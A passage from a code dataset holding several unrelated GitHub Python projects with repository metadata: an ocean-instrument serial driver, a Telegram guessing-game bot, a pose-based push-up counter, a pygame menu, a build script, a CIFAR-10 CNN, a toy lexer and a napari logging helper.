lw=4)\nax.set_xlabel('Measured')\nax.set_ylabel('Predicted')\nplt.title('')\nplt.show()","repo_name":"vucko83/Pharma_research","sub_path":"Old/Predictions_and_Viz.py","file_name":"Predictions_and_Viz.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23367611335","text":"from .serial_common import Serial_instrument\nfrom . import common, seabird_configure\n\n## This module shall contain functions/methods etc common to one or more Seabird\n## instruments. To access the serial driver, all functions etc must call the\n## serial_common module, NOT THE SERIAL DRIVER DIRECTLY. In this way, changes to\n## the serial driver will not require updates to this module.\n\nclass Seabird_instrument(Serial_instrument):\n def __init__(self):\n # Initialize shared Instrument superclass attributes...\n super().__init__()\n\n def sbe_cmd(self, cmd):\n \"\"\"\n Send a command to an instrument, checking first that it has not timed out, or\n waking it if it has.\n \"\"\"\n if self.sbe_timedout():\n self.sbe_get_prompt()\n return self.cap_cmd(cmd)\n\n def sbe_get_reply(self, cmd):\n \"\"\"\n Send a command to an instrument and return the reply.\n \"\"\"\n self.cap_cmd(cmd)\n return self.buf\n\n def sbe_get_prompt(self):\n \"\"\"\n Wake instrument, check for '>' char in response (recognizes the executed tag or\n the S prompt...\n \"\"\"\n self.cap_cmd('')\n if \">\" in self.buf:\n return True\n else: return False\n\n def sbe_timedout(self):\n if not self.buffer_empty():\n self.cap_buf()\n if \"time out\" in self.buf:\n return True\n else:\n return False\n \n def sbe_connect(self):\n # Open a serial (RS232) connection...\n self.connect()\n\n # Get a prompt to confirm connection...\n while not self.sbe_get_prompt():\n if common.usertryagain(\"Failed to communicate with instrument.\"):\n continue\n else:\n common.usercancelled()\n return False\n\n # Send and parse a 'ds' command. Parsing paramaters must be set when instrument\n # class is instantiated...\n self.sbe_parse_ds()\n return True\n\n def sbe_parse_ds(self):\n \"\"\"\n Command an instrument to display its status and then parse out all the most\n commonly used elements...\n \"\"\"\n print(\"Introducing the %s...\" % self.name) \n ds = self.get_cmd('ds').split()\n self.serialnumber = \"%s-%s\" % (self.sbe_prefix, ds[self.sn_idx])\n self.firmware = ds[self.fw_idx]\n self.vbatt = common.dec_str(ds[self.vbatt_idx])\n\n def sbe_set_ref_configs(self):\n \"\"\"\n Puts an instrument into a known configuration prior to conducting another\n procedure, i.e. QCT, deployment, etc. Specific configurations are defined in an\n instrument's specific class definition.\n \"\"\"\n for config in self.ref_configs:\n self.cap_cmd('%s\\n' % config)\n return True\n\n def sbe_set_datetime(self, t):\n return self.cap_cmd('datetime=%s' % t)\n\n def sbe_set_startdatetime(self, t):\n return self.cap_cmd('startdatetime=%s' % t)\n\n def sbe_get_time(self):\n ds = self.sbe_get_reply('ds')\n ds_date = ' '.join(ds.split()[self.dt_idx[0]:self.dt_idx[1]])\n return common.formatdate(ds_date, '%d %b %Y %H:%M:%S')\n\n def sbe_clock_set_test(self, margin, conditions=['utc']):\n for condition in conditions:\n while True:\n if condition == 'noon':\n print(\"Setting clock to noon yesterday...\")\n t1 = common.noon_yesterday()\n elif condition == 'utc':\n print(\"Setting clock to current time UTC...\")\n t1 = common.current_utc()\n self.sbe_set_datetime(common.formatdate(t1, 'sbe')) \n t2 = self.sbe_get_time()\n if common.compare_times_ordered(t1, t2, margin):\n break\n else:\n if common.usertryagain(\"There was a problem setting the clock. The reported time is %s. The expected time is %s\" % (common.formatdate(t2, 'us'), common.formatdate(t1, 'us'))):\n continue\n else:\n return False\n return True\n\n def sbe_deploy(self):\n seabird_configure.init_deploy(self)\n\n ## Inductive/IMM instrument functions...\n ##\n def imm_timedout(self):\n if not self.buffer_empty():\n self.cap_buf()\n if \"TIMEOUT\" in self.buf:\n return True\n else:\n return False\n \n def imm_poweron(self):\n self.cap_cmd('')\n if \"S>\" in self.buf:\n return True\n elif \"IMM>\" in self.buf:\n return True\n else: return False\n \n def imm_setconfigtype(self, configtype, **kwargs):\n \"\"\"\n Check the configtype of the IMM and set to the desired configtype if not already\n set. The first param must be the desired configtype. This will reinitialize the\n IMM. Any additional configurations desired may be passed in as optional keyword\n value pairs.\n \n Example: instrument.imm_setconfigtype(configtype='1', setenablebinarydata='0')\n \"\"\"\n # Determine the currently set configtype of the imm...\n while True:\n print(\"Verifying IMM configuration...\")\n self.imm_cmd('getcd')\n configtypestr = \"ConfigType='\"\n i = self.buf.find(configtypestr)\n if i < 0: # For whatever reason, 'getcd' did not do what we expected...\n if not common.usertryagain(\"Could not get IMM configtype.\"):\n return False\n else: # If this was called before powering the IMM, etc., try again...\n continue\n current_configtype = self.buf[i + len(configtypestr)]\n \n # If different from intended configtype, change it...\n if configtype != current_configtype:\n print(\"Configuring IMM...\")\n self.imm_init()\n self.cap_cmd('setconfigtype=%s' % configtype)\n self.cap_cmd('setconfigtype=%s' % configtype)\n self.imm_poweron()\n for name, value in kwargs.items():\n self.imm_cmd(\"%s=%s\" % (name, value))\n continue\n return True\n\n def imm_init(self):\n self.cap_cmd('*INIT')\n self.cap_cmd('*INIT')\n return self.imm_poweron()\n \n def imm_init_connection(self): \n self.connect()\n\n # Establish communication with the IMM...\n self.imm_poweron()\n self.imm_cmd(\"gethd\")\n self.imm_setconfigtype(configtype='1', setenablebinarydata='0')\n \n # Establish communication with the instrument...\n print(\"Waking the instrument...\")\n self.imm_remote_wakeup()\n \n self.imm_get_remote_id()\n\n self.imm_cmd('#%soutputexecutedtag=n' % self.remote_id)\n ds = self.imm_remote_reply('ds').split()\n self.serialnumber = \"%s-%s\" % (self.sbe_prefix, ds[self.sn_idx])\n print(\"Serial no.: %s\" % self.serialnumber)\n return True\n\n def imm_cmd(self, cmd):\n \"\"\"\n Send a command to an IMM, checking first that the IMM has not timed out, or\n waking it if it has.\n \"\"\"\n if self.imm_timedout():\n self.imm_poweron()\n return self.cap_cmd(cmd)\n \n def imm_remote_wakeup(self):\n return self.imm_cmd('pwron')\n \n def imm_get_remote_id(self):\n while True:\n self.imm_cmd('id?')\n loc = self.buf.find('id = ')\n if loc == -1: # id not found in imm response...\n if common.usertryagain(\"Unable to get remote id.\"):\n continue\n else:\n return False\n self.remote_id = self.buf[loc+5:loc+7]\n return True\n \n def imm_set_remote_id(self, ID):\n i = 0\n while True:\n self.imm_get_remote_id()\n if self.remote_id == ID:\n return True\n if i:\n if not common.usertryagain(\"Failed to set remote id.\"):\n return False \n self.cap_cmd('*id=%s' % ID)\n self.cap_cmd('*id=%s' % ID)\n i += 1\n\n def imm_remote_reply(self, cmd):\n self.imm_cmd('#%s%s' % (self.remote_id, cmd))\n return self.buf\n \n def imm_set_datetime(self, t):\n return self.imm_cmd('#%sdatetime=%s' % (self.remote_id, t))\n\n def imm_set_startdatetime(self, t):\n return self.imm_cmd('#%sstartdatetime=%s' % (self.remote_id, t))\n\n def imm_remote_cmd(self, cmd):\n pass\n\n def imm_initlogging(self):\n self.imm_cmd('#%sinitlogging' % self.remote_id)\n if 'confirm' in self.buf:\n self.cap_cmd('#%sinitlogging' % self.remote_id)\n return True\n \n def imm_configure(self, cmdfile):\n seabird_configure.imm_configure(self, cmdfile)","repo_name":"asmith75218/cg_inst_automation","sub_path":"common/seabird_common.py","file_name":"seabird_common.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32271425164","text":"from aiogram import Bot, Dispatcher, types, executor\nimport random\nimport decouple\nfrom config import token\n\nbot = Bot(token)\ndp = Dispatcher(bot)\n\n@dp.message_handler(commands='start')\nasync def start(message:types.Message):\n await message.answer(f\"Я загадал число от 1 до 3 угадайте {message.from_user.full_name}!\")\n\n@dp.message_handler()\nasync def guess_number(message:types.Message):\n user_number = message.text.strip()\n if not user_number.isdigit:\n await message.answer(\"Введите только число пожалуйста\")\n\n user_number = int(user_number)\n bot_number = random.randint(1, 3)\n\n if user_number == bot_number:\n await message.answer(\"Правильно! Вы отгадали!\")\n else:\n await message.answer(f\"Неправильно! Я загадал число {bot_number}\")\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)\n\n ","repo_name":"kbnrma/hw1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5965409535","text":"# 参考\n# https://google.github.io/mediapipe/solutions/pose\n\nimport math\n\nimport cv2\nimport mediapipe as mp\nfrom playsound import playsound\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n# model load\nmp_pose = mp.solutions.pose\n\n# For static images:\nIMAGE_FILES = []\nBG_COLOR = (192, 192, 192) # gray\nwith mp_pose.Pose(\n static_image_mode=True,\n model_complexity=2,\n enable_segmentation=True,\n min_detection_confidence=0.5) as pose:\n for idx, file in enumerate(IMAGE_FILES):\n image = cv2.imread(file)\n image_height, image_width, _ = image.shape\n # Convert the BGR image to RGB before processing.\n results = pose.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n if not results.pose_landmarks:\n continue\n print(\n f'Nose coordinates: ('\n f'{results.pose_landmarks.landmark[mp_pose.PoseLandmark.NOSE].x * image_width}, '\n f'{results.pose_landmarks.landmark[mp_pose.PoseLandmark.NOSE].y * image_height})'\n )\n\n annotated_image = image.copy()\n # Draw segmentation on the image.\n # To improve segmentation around boundaries, consider applying a joint\n # bilateral filter to \"results.segmentation_mask\" with \"image\".\n condition = np.stack((results.segmentation_mask,) * 3, axis=-1) > 0.1\n bg_image = np.zeros(image.shape, dtype=np.uint8)\n bg_image[:] = BG_COLOR\n annotated_image = np.where(condition, annotated_image, bg_image)\n # Draw pose landmarks on the image.\n mp_drawing.draw_landmarks(\n annotated_image,\n results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\n cv2.imwrite('/tmp/annotated_image' + str(idx) + '.png', annotated_image)\n # Plot pose world landmarks.\n mp_drawing.plot_landmarks(\n results.pose_world_landmarks, mp_pose.POSE_CONNECTIONS)\n\n# For webcam input:\n# cap = cv2.VideoCapture(0)\n# cap = cv2.VideoCapture(1)\ncap = cv2.VideoCapture(\"sample_video\\pushup_sample.mp4\")\nfps = cap.get(cv2.CAP_PROP_FPS)\n# 3秒間に1度だけカウントするように定義する。\nmax_inference = fps * 3\n\npush_up_cnt = 0\nframe = 0\n# 画像保存用\ncount = 0\nwith mp_pose.Pose(\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n frame +=1\n success, image = cap.read()\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n\n # To improve performance, optionally mark the image as not writeable to\n # pass by reference.\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = pose.process(image)\n\n # 判定する基準の設定\n if results.pose_landmarks:\n for idx, landmark in enumerate(results.pose_landmarks.landmark):\n if idx == 12: # 11: # 左肩\n left_shoulder = landmark\n if idx == 20: # 19: # 左手\n left_index = landmark\n # 2点間の距離を求める\n distance = math.sqrt((left_shoulder.x - left_index.x)**2 + (left_shoulder.y - left_index.y)**2)\n # print(distance)\n\n # countをn秒に1回にしたい。\n if frame > max_inference:\n if distance < 0.15:\n push_up_cnt += 1\n if push_up_cnt % 3 ==0:\n playsound(\"sound\\sample_sound.mp3\")\n # frame数の初期化\n frame = 0\n print('push up success', f'cnt : {push_up_cnt}')\n\n\n\n # Draw the pose annotation on the image.\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n mp_drawing.draw_landmarks(\n image,\n results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\n # Flip the image horizontally for a selfie-view display.\n # cv2.imshow('pushup_count', cv2.flip(image, 1))\n cv2.putText(image,\n text='pushup count : ' + str(push_up_cnt),\n org=(10, 40),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=1.0,\n color=(0, 255, 0),\n thickness=3,\n lineType=cv2.LINE_4)\n cv2.imshow('pushup_count', image)\n # 画像保存\n # cv2.imwrite(f\"./result/{str(count).zfill(3)}_frame.jpg\", image)\n # count += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Kentea-Watanabe/push_up_count","sub_path":"src/pushup_app.py","file_name":"pushup_app.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25827384900","text":"\"\"\"\r\n@author: CD2H3 members\r\n\r\n\"\"\"\r\nimport pygame\r\nimport sys\r\nimport os\r\nimport time\r\nfrom pygame.locals import *\r\nimport random\r\nimport hanoi\r\nimport puzzlegame\r\nimport sudoku\r\n\r\npygame.init()\r\nsize=(800,600)\r\nscreen = pygame.display.set_mode(size)\r\npygame.display.set_caption(\"Christmas game\")# window tittle\r\nbg = pygame.mixer.Sound('sound/Christmas music.mp3')\r\nback1 =pygame.image.load('images/back1.png')\r\nabout =pygame.image.load('images/about.jpg')\r\nabout1 =pygame.image.load('images/about1.png')\r\n\r\n\r\ndef show_image(image):\r\n\tbackground = pygame.image.load(image).convert() \r\n\tscreen = pygame.display.set_mode(size)\r\n\tscreen.blit(background,(0,0))\r\n\tpygame.display.update()\r\n\r\ndef toabout() :\r\n screen.blit(about,(0,0))# show \"how to play\"\r\n screen.blit(back1,(100,500))# show \"back\"\r\n bg.stop()# stop music\r\n\r\ndef main():\r\n show_image(\"images/Background.png\") #main page background\r\n screen.blit(about1, (600, 500))\r\n pygame.display.flip() # update the surface\r\n bg.set_volume(0.2)\r\n bg.play(-1) # Keep playing music\r\n while True:\r\n # quit game\r\n for event in pygame.event.get():\r\n if event.type==pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n #Mouse triggers three games \r\n elif event.type==MOUSEBUTTONDOWN:\r\n x=event.pos[0]\r\n y=event.pos[1]\r\n if (x in range(500,580) or x in range(700,780)) and y in range(335,360):\r\n bg.stop()\r\n puzzlegame.play() # play the Jigsaw Puzzle game\r\n # when the player win or exit the game\r\n # call main recursively to show the main interface and waiting for input form\r\n # user\r\n main()\r\n elif x in range(270,407) and y in range(424,470):#if the user clicks the middle window\r\n bg.stop()\r\n hanoi.play()#play the hanoi game\r\n #when the player win or exit the game\r\n #call main recursively to show the main interface and waiting for input form\r\n #user\r\n main()\r\n elif x in range(533,642) and y in range(182,210):\r\n bg.stop()\r\n sudoku.play() # play the sudoku game\r\n # when the player win or exit the game\r\n # call main recursively to show the main interface and waiting for input form\r\n # user\r\n main()\r\n elif x in range(600,700) and y in range(500,550):\r\n #bg.stop()\r\n toabout()\r\n pygame.display.flip()\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # window closing event\r\n # pygame.quit()\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN: # mouse click event\r\n if pygame.mouse.get_pressed() == (1, 0, 0): # press the left mouse button\r\n # sound.play()\r\n mx, my = pygame.mouse.get_pos() # gets the current mouse coordinates\r\n if mx > 100 and mx < 200: # back to play\r\n if my > 500 and my < 550:\r\n main()\r\n # pygame.mixer.music.play(-1, 0.0, 0)\r\n\r\n return\r\n else:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"marc0317-dsg/Pygame","sub_path":"git/New_CD2H3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28997770574","text":"# -*- Python -*-\n\nimport os\n\nfrom CXL_init import *\n\nImport('*')\n\nappName = \"CXLTeaPot-bin\"\n\nenv = CXL_env.Clone()\n\n#env.Append(CXL_commonproj_dir = env['CXL_common_dir'] + \"/../CommonProjects\")\ncompiler_base_flags = \" -Wall -g -fmessage-length=0 -Wno-unknown-pragmas -pthread -D_DEBUG \"\nenv.Replace(CPPFLAGS = compiler_base_flags)\n\nenv.Append( CPPPATH = [ \n \"./\",\n \"./inc\",\n \"../AMDTTeaPotLib/inc\",\n \"../AMDTTeaPotLib\",\n env['CXL_commonproj_dir'] + \"/AMDTOSWrappers/Include\",\n env['CXL_commonproj_dir'] + \"/AMDT/Include\",\n \"/usr/include/GL\",\n \"/usr/include/freetype2\",\n \"/usr/include/libpng12\",\n \"/usr/lib/x86_64-linux-gnu/glib-2.0/include\",\n \"/usr/include/freetype2\",\n\n])\n\nenv.Append( LIBPATH = [\n \"/usr/lib/x86_64-linux-gnu/mesa\",\n env['CXL_Examples_dir'] + \"/release\",\n])\n\n# Source files:\nsources = \\\n[\n# src:\n \"src/Teapot.cpp\",\n \"src/GLWindow.cpp\",\n]\n\ncommonLinkedLibraries = \\\n[\n \"fltk_gl.a\",\n \"fltk.a\",\n \"CXLTeaPot\",\n \"GL\",\n \"libglib-2.0\",\n \"X11\",\n \"dl\",\n \"pthread\",\n \"Xext\",\n \"Xft\",\n \"fontconfig\",\n \"Xcursor\",\n \"Xfixes\",\n \"Xinerama\"\n]\n\nlinkedLibraries = commonLinkedLibraries\nenv.Prepend (LIBS = linkedLibraries)\n\n\n# Set the ELF hash generation mode:\n# - When building on new systems, we would like to generate both sysv and gnu ELF hashes.\n# This enables running the executable also on old systems, that support only the sysv ELF hash.\n# - When building on old systems, we need to set the GR_GENERATE_ONLY_DEFAULT_ELF_HASH environment\n# variable (preferably in the .bashrc file). Otherwise the link will fail when trying to\n# generate an ELF hash type that the old linker does not recognize.\n# [Yaki 7/7/2009]\nlinkerFlags = [] \nshouldGenerateOnlyDefaultELFHash = os.environ.get('GR_GENERATE_ONLY_DEFAULT_ELF_HASH')\nif shouldGenerateOnlyDefaultELFHash is None:\n linkerFlags += [ \"-Wl,--hash-style=both,-lz,-lrt\" ]\n\n# Creating executable\nexe = env.Program(\n target = appName, \n source = sources,\n LINKFLAGS = linkerFlags)\n\n# Installing libraries\nlibInstall = env.Install( \n dir = env['CXL_Examples_dir'] + '/release', \n source = (exe))\n\nReturn('libInstall')\n","repo_name":"GPUOpen-Archive/CodeXL","sub_path":"CodeXL/Examples/AMDTTeaPot/AMDTTeaPot/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":989,"dataset":"github-code","pt":"37"} +{"seq_id":"75015668907","text":"import tensorflow as tf\nfrom convmnist import createWeight, createBias, createConv, createPool\nimport numpy as np\nimport time\nimport models.tutorials.image.cifar10.cifar10 \nimport models.tutorials.image.cifar10.cifar10_input\n\nMAX_STEPS = 3000\nBATCH_SIZE = 128\nLEARNING_RATE = 1e-3\nDATA_DIR = \"./cifar10_data/cifar-10-batches-bin\"\n\ndef variable_with_weight_loss(shape, stddev, wl):\n var = tf.Variable(tf.truncated_normal(shape, tf.float32, stddev = stddev))\n if wl is not None:\n weight_loss = tf.multiply(tf.nn.l2_loss(var), wl, name = \"weight_loss\")\n tf.add_to_collection('losses', weight_loss)\n return var\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits = logits, labels = labels)\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n tf.add_to_collection('losses', cross_entropy_mean)\n return tf.add_n(tf.get_collection('losses'))\n\nwith tf.name_scope(\"placeholders\"):\n image_holder = tf.placeholder(tf.float32, [BATCH_SIZE, 24, 24, 3])\n label_holder = tf.placeholder(tf.float32, [BATCH_SIZE])\n\nwith tf.name_scope(\"first_conv\"):\n weight1 = variable_with_weight_loss([5, 5, 3, 64], stddev = 5e-2, wl = 0.0)\n kernel1 = tf.nn.conv2d(image_holder, weight1, [1, 1, 1, 1], 'SAME')\n bias1 = tf.Variable(tf.constant(0.0, shape = [64]))\n conv1 = tf.nn.relu(tf.nn.bias_add(kernel1, bias1))\n pool1 = tf.nn.max_pool(conv1, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME')\n norm1 = tf.nn.lrn(pool1, 4, bias = 1.0, alpha = 0.001 / 9.0, beta = 0.75)\n\nwith tf.name_scope(\"second_conv\"):\n weight2 = variable_with_weight_loss([5, 5, 64, 64], stddev = 5e-2, wl = 0.0)\n kernel2 = tf.nn.conv2d(norm1, weight2, [1, 1, 1, 1], 'SAME')\n bias2 = tf.Variable(tf.constant(0.1, [64]))\n conv2 = tf.nn.relu(tf.nn.bias_add(kernel2, bias2))\n norm2 = tf.nn.lrn(conv2, 4, bias = 1.0, alpha = 0.001 / 9.0, beta = 0.75)\n pool2 = tf.nn.max_pool(norm2, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\nwith tf.name_scope(\"first_fully_connected\"):\n reshape = tf.reshape(pool2, [BATCH_SIZE, -1])\n dim = reshape.get_shape()[1].value\n weight3 = variable_with_weight_loss([dim, 384], stddev = 0.04, wl = 0.004)\n bias3 = tf.Variable(tf.constant(0.1, shape = [384]))\n local3 = tf.nn.relu(tf.matmul(reshape, weight3) + bias3)\n\nwith tf.name_scope(\"second_fully_connected\"):\n weight4 = variable_with_weight_loss([384, 192], stddev = 0.04, wl = 0.004)\n bias4 = tf.Variable(tf.constant(0.1, shape = [192]))\n local4 = tf.nn.relu(tf.matmul(local3, weight4) + bias4)\n\nwith tf.name_scope(\"third_fully_connected\"):\n weight5 = variable_with_weight_loss([192, 10], stddev = 1/192.0, wl = 0.0)\n bias5 = tf.Variable(tf.constant(0.0, shape = [10]))\n logits = tf.add(tf.matmul(local4, weight5) + bias5)\n\nwith tf.name_scope(\"loss\"):\n loss = loss(logits, label_holder)\n\nwith tf.name_scope(\"trianer\"):\n trainer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\ntop_k_op = tf.nn.in_top_k(logits, label_holder, 1)\n\nif __name__ == '__main__':\n cifar_10.maybe_download_extract()\n images_train, labels_train = cifar10_input.distorted_inputs(\n data_dir = DATA_DIR, batch_size = BATCH_SIZE)\n images_test, labels_test = cifar10_input.inputs(eval_data = True,\n data_dir = DATA_DIR,\n batch_size = BATCH_SIZE)\n sess = tf.InteractiveSession()\n tf.global_variables_initializer.run()\n tf.train.start_queue_runners()\n writer = tf.summary.FileWriter(\"./logs/convcifar10/\", sess.graph)\n for step in range(MAX_STEPS):\n start_time = time.time()\n image_batch, label_batch = sess.run([images_train, labels_train])\n _, loss_value = sess.run(trainer, loss,\n feed_dict = {image_holder: image_batch, label_holder: label_batch})\n duration = time.time() - start_time\n if step % 10 == 0:\n examples_per_sec = BATCH_SIZE / duration\n sec_per_batch = float(duration)\n\n print(\"loss: %f, examples/s: %f, s/batch:%f\" \\\n % (loss_value, examples_per_sec, sec_per_batch))\n \n num_examples = 10000\n import math\n num_iter = int(math.ceil(num_examples / BATCH_SIZE))\n true_count = 0\n total_sample_count = num_iter * BATCH_SIZE\n step = 0\n while step < num_iter:\n image_batch, label_batch = sess.run(images_test, labels_test)\n predictions = sess.run(top_k_op, \n feed_dict = {image_holder: image_batch, label_holder: label_batch})\n true_count = np.sum(predictions)\n step += 1\n \n precision = true_count / total_sample_count\n print(\"presition @ 1 = %.3f\" % precision)\n\n\n","repo_name":"chenlighten/ML","sub_path":"convcifar10.py","file_name":"convcifar10.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20762112306","text":"def fcopy(fileName1,fileName2):\r\n fileIn=open(fileName1, 'r')\r\n fileOut=open(fileName2, 'w')\r\n for word in fileIn.readlines():\r\n if '//' not in word:\r\n fileOut.write(word)\r\n fileIn.close()\r\n fileOut.close()\r\nprint('==============The Input file=================')\r\nFile = open('input.txt')\r\nfilecontent = File.read()\r\nprint(filecontent)\r\nFile.close()\r\nprint('==============END =================\\n \\n')\r\nprint('==============The Output file=================')\r\nFile = open('output.txt')\r\nfilecontent = File.read()\r\nprint(filecontent)\r\nFile.close()\r\nprint('==============End=================\\n\\n')\r\n\r\nprint(\"Symbol\\t\\tToken\\t\\t\\tAttribute\")\r\nprint(\"======\\t\\t=====\\t\\t\\t==========\")\r\n\r\nfcopy('input.txt','output.txt')\r\n#open('output.txt')\r\n\r\n\r\n\r\nwith open('output.txt','r') as f:\r\n for line in f:\r\n for word in line.split():\r\n if word=='int' or word=='include'or word=='main'or word=='for' or word=='if' or word=='double' or word=='printf' or word=='scanf':\r\n\r\n print(word+' \\t\\t keyword')\r\n if word=='stdio.h' or word=='math.h'or word=='stdlib.h'or word=='string.h':\r\n print(word+' \\t\\t headerfile')\r\n if word=='i' or word=='j' or word=='sum1'or word=='sum2' or word=='d':\r\n print(word+' \\t\\t variable')\r\n \r\n\r\n\r\n\r\nFile = open('output.txt')\r\nfilecontent = File.read()\r\n\r\na=list(filecontent)\r\nfor i in range(len(a)):\r\n if a[i]=='+':\r\n fil=open('output.txt','w')\r\n fil.write(\" \"+a[i]+\"\\tarithmetic operator\\t plus\")\r\n \r\n if a[i]=='-':\r\n print( \" \"+a[i]+\"\\tarithmetic operator\\t Minus\")\r\n if a[i]=='*':\r\n print(\" \"+a[i]+\"\\tarithmetic operator\\t Multiplecation\")\r\n if a[i]=='/':\r\n print(\" \"+a[i]+\"\\tarithmetic operator\\t Divided\")\r\n if a[i]==';':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Semicoma\")\r\n if a[i]==',':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Coma\")\r\n if a[i]=='(':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol \\t Starting Openning parenteses\")\r\n if a[i]==')':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol \\t Closing parentheses\")\r\n if a[i]=='#':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Hash\")\r\n if a[i]=='{':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Opening Curly brace\")\r\n if a[i]=='}':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Closing Curly Brace\")\r\n if a[i]=='[':\r\n print(\" \"+a[i]+\"\\tSpecial Operator\\t Starting Square Brace\")\r\n if a[i]==']':\r\n print(\" \"+a[i]+\"\\tSpecial Operator\\t Closing Square Brace\")\r\n if a[i]=='%':\r\n print(\" \"+a[i]+\"\\tUnary operator\\t\\t Modulus\")\r\n if a[i]=='&':\r\n print(\" \"+a[i]+\"\\tSpecial Symbol\\t\\t Ampersand\\n\\n\")\r\n if type(a[i])=='class str':\r\n print(string)\r\nprint('\\n\\n\\t\\t==============End=================\\n\\n')\r\n","repo_name":"zh-cse18/Python-Practice-Code","sub_path":"twofile.py","file_name":"twofile.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72944635948","text":"import sys\nfrom pathlib import Path\nimport time\n\nfrom qtpy.QtWidgets import QMessageBox, QInputDialog\nfrom napari.qt.threading import thread_worker\n\n\ndef setup_logging():\n \"\"\"\n Sets up for print to write to the log file\n \"\"\"\n plugin_directory = Path(__file__).parent.parent.parent.absolute()\n print(plugin_directory)\n path = plugin_directory / \"hitl4trk.log\"\n file = open(path, \"w\")\n sys.stdout = file\n sys.stderr = file\n print(\"Logging initialized\")\n\n\ndef notify(text):\n \"\"\"\n Shows a notification dialog\n\n Parameters\n ----------\n text : str\n The text displayed as the notification\n \"\"\"\n msg = QMessageBox()\n msg.setWindowTitle(\"napari\")\n msg.setText(text)\n print(\"Notifying user: '{}'\".format(text))\n msg.exec()\n\n\n@thread_worker\ndef notify_with_delay(text):\n time.sleep(0.2)\n notify(text)\n\n\ndef choice_dialog(text, choices):\n \"\"\"\n Shows a dialog where the user has to make a decision\n\n Parameters\n ----------\n text : str\n The text displayed as the prompt for the decision\n choices : list of tuple or types of buttons\n Tuples of the potential choices, consisting of (\"button text\", \"button type\") or button types\n \"\"\"\n msg = QMessageBox()\n msg.setWindowTitle(\"napari\")\n msg.setText(text)\n for choice in choices:\n if type(choice) is tuple:\n msg.addButton(choice[0], choice[1])\n else:\n msg.addButton(choice)\n print(\"Prompting user: '{}'\".format(text))\n return msg.exec()\n\ndef layer_select(parent, layertype):\n title = \"Select Layer\"\n text = f\"Please select the layer that has the {layertype}\"\n items = []\n for layer in parent.viewer.layers:\n items.append(layer.name)\n return QInputDialog.getItem(parent, title, text, items, editable = False)\n","repo_name":"MMV-Lab/mmv-tracking-napari","sub_path":"src/mmv_tracking_napari/_logger.py","file_name":"_logger.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43373716903","text":"#!/usr/bin/env python3\nfrom socketIO_client_nexus import SocketIO, LoggingNamespace\nimport warnings\nimport os, time\nfrom mvnc import mvncapi as mvnc\nimport numpy\nimport cv2\nimport os, sys\nimport json\nimport picamera\nimport picamera.array\n\nwarnings.simplefilter(\"ignore\", DeprecationWarning)\n\n#define some global variables and load necessary data\n# Load graph\npath_to_networks = './Inception-v3/'\n#path_to_images = dir\ngraph_filename = 'graph'\nwith open(path_to_networks + graph_filename, mode='rb') as f:\n graphfile = f.read()\n\n# Load categories\ncategories = []\nwith open(path_to_networks + 'categories.txt', 'r') as f:\n for line in f:\n cat = line.split('\\n')[0]\n if cat != 'classes':\n categories.append(cat)\n f.close()\n #print('Number of categories:', len(categories))\n\n# Load dict\ndict = []\nwith open(path_to_networks + 'dict.txt', 'r') as f:\n for line in f:\n cat = line.split('\\n')[0]\n dict.append(cat)\n 